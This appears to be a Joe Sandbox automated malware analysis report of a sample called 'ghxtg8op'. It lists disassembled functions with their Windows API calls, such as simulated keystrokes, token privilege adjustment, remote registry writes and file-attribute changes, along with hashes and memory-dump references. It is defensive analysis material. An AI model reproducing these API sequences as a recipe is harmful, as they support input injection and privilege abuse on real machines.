                            • Instruction ID: ac9b3385d2363471d3cf4004fff6c10c41d4eeadf261a3112a2cd0a1ada0d297
                            • Opcode Fuzzy Hash: 51fe473e263e6a9fc44a0a986c1be3396793efab5d43c79812298bd26203d5ad
                            • Instruction Fuzzy Hash: EFF03971501712CFCB349F64E494912BBE1BF143393288A3EF1D682620C7329880DF60
                            Function 00D60791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00D472BD,00000001,00E06290,?,00D43BBB,00E052F8,00E052E0,?,?), ref: 00D607B0
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LongNamePath_memmove
                            • String ID:
                            • API String ID: 2514874351-0
                            • Opcode ID: 7f475b5c7052421d2edae3f01430a629908446b3434ee6d8ae800471bb5e73c4
                            • Instruction ID: 4ef72a288ffcfb6fcacc23d4fdc276fd67713c94499a5f5b546efb841d1b296c
                            • Opcode Fuzzy Hash: 7f475b5c7052421d2edae3f01430a629908446b3434ee6d8ae800471bb5e73c4
                            • Instruction Fuzzy Hash: 33E0CD369042295BC721D65C9C05FEAB7DDDF887A0F0441B5FD0CD7304DA609C808AF0
                            Function 00DA8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                            • Instruction ID: 515f0cab9d62a6b87999a2b0dd5226866eedafed98db2078c9a4cec6c5ea71a6
                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                            • Instruction Fuzzy Hash: 42E092B1504B009BD7388E24D800BA373E1EB06304F04081DF6AA83241EB6378419769
                            Function 00D62C44 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D63217: __lock.LIBCMT ref: 00D63219
                            • __onexit_nolock.LIBCMT ref: 00D62C60
                              • Part of subcall function 00D62C88: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62C9B
                              • Part of subcall function 00D62C88: DecodePointer.KERNEL32(?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62CA6
                              • Part of subcall function 00D62C88: __realloc_crt.LIBCMT ref: 00D62CE7
                              • Part of subcall function 00D62C88: __realloc_crt.LIBCMT ref: 00D62CFB
                              • Part of subcall function 00D62C88: EncodePointer.KERNEL32(00000000,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62D0D
                              • Part of subcall function 00D62C88: EncodePointer.KERNEL32(00D7B5BA,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62D1B
                              • Part of subcall function 00D62C88: EncodePointer.KERNEL32(00000004,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62D27
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                            • String ID:
                            • API String ID: 3536590627-0
                            • Opcode ID: a4484af2a16eb4dd773ec0a06d0d373d5f8cefde867d2d21413a1357ddcf8aef
                            • Instruction ID: 1df224b725751e114cc8fee5eb917c6858123bfc839ece3eae33ea337617d6d6
                            • Opcode Fuzzy Hash: a4484af2a16eb4dd773ec0a06d0d373d5f8cefde867d2d21413a1357ddcf8aef
                            • Instruction Fuzzy Hash: B3D01271D4160DABDB10BBA4C90676C7A60EF14722F518345F014661C2CB780B019FB6
                            Function 00D45C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00D45C5F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: d58b6823a038b89e329c52ffe466fefe2bc1fc2fb993e80a77b547a9574b1d47
                            • Instruction ID: ac19681d533f891a23f18a6c2571954a50ca63fbdcb89ca80cb999f0cfa02492
                            • Opcode Fuzzy Hash: d58b6823a038b89e329c52ffe466fefe2bc1fc2fb993e80a77b547a9574b1d47
                            • Instruction Fuzzy Hash: 92D0C77464030CBFE710DB80DC46FA9777DD705710F100194FD0496390D6B27D508795
                            Function 00D6525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction ID: bfefa9ff1d3727d894571984ac0ce34836e9130a130934dfec95e3fc6c0d46f8
                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction Fuzzy Hash: E9B0927644020C77CE012A82FC02A493B199B45764F408020FB0C18162E673A6A49AA9
                            Function 00DAD07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000002,00000000), ref: 00DAD1FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 19dd120714b0ab5f830b1867ca8d88a3e26a62ab2d5ef3b006863d323ec3c307
                            • Instruction ID: a5f3b1a832dae9b4dadf4bc3e06dbdb6f41dcbad31f45e6254d8be9dcde2799a
                            • Opcode Fuzzy Hash: 19dd120714b0ab5f830b1867ca8d88a3e26a62ab2d5ef3b006863d323ec3c307
                            • Instruction Fuzzy Hash: 8A714E346043018FCB14EF68D491A6EB7E5EF8A314F04492DF8969B7A2DB30E945CB72
                            Function 00993DA8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 00993DB9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: b8449012ada40eefd0da39224076ae01429e843d0a252d18a65e312f564b1980
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: A8E0E67494010EDFDB00DFB8D54969E7BB4EF04301F104161FD01D2680DA309E508A62

                            Non-executed Functions

                            Function 00DCCABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DCCB37
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DCCB95
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCCBD6
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DCCC00
                            • SendMessageW.USER32 ref: 00DCCC29
                            • _wcsncpy.LIBCMT ref: 00DCCC95
                            • GetKeyState.USER32(00000011), ref: 00DCCCB6
                            • GetKeyState.USER32(00000009), ref: 00DCCCC3
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DCCCD9
                            • GetKeyState.USER32(00000010), ref: 00DCCCE3
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DCCD0C
                            • SendMessageW.USER32 ref: 00DCCD33
                            • SendMessageW.USER32(?,00001030,?,00DCB348), ref: 00DCCE37
                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DCCE4D
                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DCCE60
                            • SetCapture.USER32(?), ref: 00DCCE69
                            • ClientToScreen.USER32(?,?), ref: 00DCCECE
                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DCCEDB
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DCCEF5
                            • ReleaseCapture.USER32(?,?,?), ref: 00DCCF00
                            • GetCursorPos.USER32(?), ref: 00DCCF3A
                            • ScreenToClient.USER32(?,?), ref: 00DCCF47
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DCCFA3
                            • SendMessageW.USER32 ref: 00DCCFD1
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DCD00E
                            • SendMessageW.USER32 ref: 00DCD03D
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DCD05E
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DCD06D
                            • GetCursorPos.USER32(?), ref: 00DCD08D
                            • ScreenToClient.USER32(?,?), ref: 00DCD09A
                            • GetParent.USER32(?), ref: 00DCD0BA
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DCD123
                            • SendMessageW.USER32 ref: 00DCD154
                            • ClientToScreen.USER32(?,?), ref: 00DCD1B2
                            • TrackPopupMenuEx.USER32 ref: 00DCD1E2
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DCD20C
                            • SendMessageW.USER32 ref: 00DCD22F
                            • ClientToScreen.USER32(?,?), ref: 00DCD281
                            • TrackPopupMenuEx.USER32 ref: 00DCD2B5
                              • Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCD351
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F$pb
                            • API String ID: 3977979337-96320988
                            • Opcode ID: d3860fbe0ceff8e028b9e1c98e01bfc97559b10f182eae0d691b133202ac27d8
                            • Instruction ID: 2a848b4894f5de87fbdb8feb0dbc1555a288eefcceabf55d16c78da422a7413e
                            • Opcode Fuzzy Hash: d3860fbe0ceff8e028b9e1c98e01bfc97559b10f182eae0d691b133202ac27d8
                            • Instruction Fuzzy Hash: 07427974214342AFDB25CF64C845FAABBE6EF49310F181A2DF6A9D72A0C731D844DB61
                            Function 00D56F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove$_memset
                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                            • API String ID: 1357608183-1798697756
                            • Opcode ID: a0020e64f75c84fb8e53cf723774e346de71642efd852672189ab77d65447e9d
                            • Instruction ID: 847409002247402327f3dbb919206f98b7e546c0044b24f51aebccd66461101f
                            • Opcode Fuzzy Hash: a0020e64f75c84fb8e53cf723774e346de71642efd852672189ab77d65447e9d
                            • Instruction Fuzzy Hash: 3B939275A00215DBDF24CF98D881BBDB7B1FF48310F29816AED55AB291E7709E81CB60
                            Function 00D448D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 00D448DF
                            • FindWindowW.USER32 ref: 00D7D665
                            • IsIconic.USER32(?), ref: 00D7D66E
                            • ShowWindow.USER32(?,00000009), ref: 00D7D67B
                            • SetForegroundWindow.USER32(?), ref: 00D7D685
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D7D69B
                            • GetCurrentThreadId.KERNEL32 ref: 00D7D6A2
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7D6AE
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D7D6BF
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D7D6C7
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D7D6CF
                            • SetForegroundWindow.USER32(?), ref: 00D7D6D2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D6E7
                            • keybd_event.USER32 ref: 00D7D6F2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D6FC
                            • keybd_event.USER32 ref: 00D7D701
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D70A
                            • keybd_event.USER32 ref: 00D7D70F
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D719
                            • keybd_event.USER32 ref: 00D7D71E
                            • SetForegroundWindow.USER32(?), ref: 00D7D721
                            • AttachThreadInput.USER32(?,?,00000000), ref: 00D7D748
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 4125248594-2988720461
                            • Opcode ID: 5cbc924bcea3ecf94a465aa1bb26e76e694afb07f8ec6363505317e7a7b1e4b1
                            • Instruction ID: ac79a639494c5fbd9869ca917a555c40c9e38206ee69b9b61c87051ccb665423
                            • Opcode Fuzzy Hash: 5cbc924bcea3ecf94a465aa1bb26e76e694afb07f8ec6363505317e7a7b1e4b1
                            • Instruction Fuzzy Hash: D1319571A403197BEB205B618C49FBF3E6EEF44B50F144025FA05EA2D1D6B05C01AAB0
                            Function 00D98310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9882B
                              • Part of subcall function 00D987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98858
                              • Part of subcall function 00D987E1: GetLastError.KERNEL32 ref: 00D98865
                            • _memset.LIBCMT ref: 00D98353
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D983A5
                            • CloseHandle.KERNEL32(?), ref: 00D983B6
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D983CD
                            • GetProcessWindowStation.USER32 ref: 00D983E6
                            • SetProcessWindowStation.USER32 ref: 00D983F0
                            • OpenDesktopW.USER32 ref: 00D9840A
                              • Part of subcall function 00D981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D98309), ref: 00D981E0
                              • Part of subcall function 00D981CB: CloseHandle.KERNEL32(?), ref: 00D981F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                            • String ID: $default$winsta0
                            • API String ID: 2063423040-1027155976
                            • Opcode ID: 15b1b96f1d751bdd1e18bbca41a10ee5236632db06038984de85f151b3874c37
                            • Instruction ID: e9cba85d4ed76ff0ad1307bd42346519107c5253c3201f3166f9af44f80bd827
                            • Opcode Fuzzy Hash: 15b1b96f1d751bdd1e18bbca41a10ee5236632db06038984de85f151b3874c37
                            • Instruction Fuzzy Hash: 8D8158B190020AAFDF519FA4CC45EFEBBB9EF05704F184169F914A6261DB318E19EB70
                            Function 00DAC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 00DAC78D
                            • FindClose.KERNEL32(00000000), ref: 00DAC7E1
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DAC806
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DAC81D
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DAC844
                            • __swprintf.LIBCMT ref: 00DAC890
                            • __swprintf.LIBCMT ref: 00DAC8D3
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • __swprintf.LIBCMT ref: 00DAC927
                              • Part of subcall function 00D63698: __woutput_l.LIBCMT ref: 00D636F1
                            • __swprintf.LIBCMT ref: 00DAC975
                              • Part of subcall function 00D63698: __flsbuf.LIBCMT ref: 00D63713
                              • Part of subcall function 00D63698: __flsbuf.LIBCMT ref: 00D6372B
                            • __swprintf.LIBCMT ref: 00DAC9C4
                            • __swprintf.LIBCMT ref: 00DACA13
                            • __swprintf.LIBCMT ref: 00DACA62
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            • API String ID: 3953360268-2428617273
                            • Opcode ID: 3a6741976b8cdbc2932910501df2ff0d0efcd046953df03d1a9e6a6731d83d89
                            • Instruction ID: ed060481759585c8a829a4227af3cebebf37285556104bf4b08f7f4fa6259a3a
                            • Opcode Fuzzy Hash: 3a6741976b8cdbc2932910501df2ff0d0efcd046953df03d1a9e6a6731d83d89
                            • Instruction Fuzzy Hash: 76A10AB1418345ABC710EBA5C896DAFB7ECFF99700F400929F595C6192EB35DA08CB72
                            Function 00DAEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00DAEFB6
                            • _wcscmp.LIBCMT ref: 00DAEFCB
                            • _wcscmp.LIBCMT ref: 00DAEFE2
                            • GetFileAttributesW.KERNEL32(?), ref: 00DAEFF4
                            • SetFileAttributesW.KERNEL32(?,?), ref: 00DAF00E
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DAF026
                            • FindClose.KERNEL32(00000000), ref: 00DAF031
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00DAF04D
                            • _wcscmp.LIBCMT ref: 00DAF074
                            • _wcscmp.LIBCMT ref: 00DAF08B
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DAF09D
                            • SetCurrentDirectoryW.KERNEL32(00DF8920), ref: 00DAF0BB
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DAF0C5
                            • FindClose.KERNEL32(00000000), ref: 00DAF0D2
                            • FindClose.KERNEL32(00000000), ref: 00DAF0E4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1803514871-438819550
                            • Opcode ID: 1a72f560748e4bf359fd822e21fdf9f19a7068fcee162b7c33da4fe797f5dc01
                            • Instruction ID: f63b1ebd5373a50a319030432f8b1b50e2f4e5209dff8d80e15796c8ade0a53b
                            • Opcode Fuzzy Hash: 1a72f560748e4bf359fd822e21fdf9f19a7068fcee162b7c33da4fe797f5dc01
                            • Instruction Fuzzy Hash: 9731BF3250121A6EDB149BA4DC48FEEB7ADDF4A360F1441B5E804E31A1DB70DA44CA79
                            Function 00DC0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC0953
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DCF910,00000000,?,00000000,?,?), ref: 00DC09C1
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC0A09
                            • RegSetValueExW.ADVAPI32 ref: 00DC0A92
                            • RegCloseKey.ADVAPI32(?), ref: 00DC0DB2
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC0DBF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
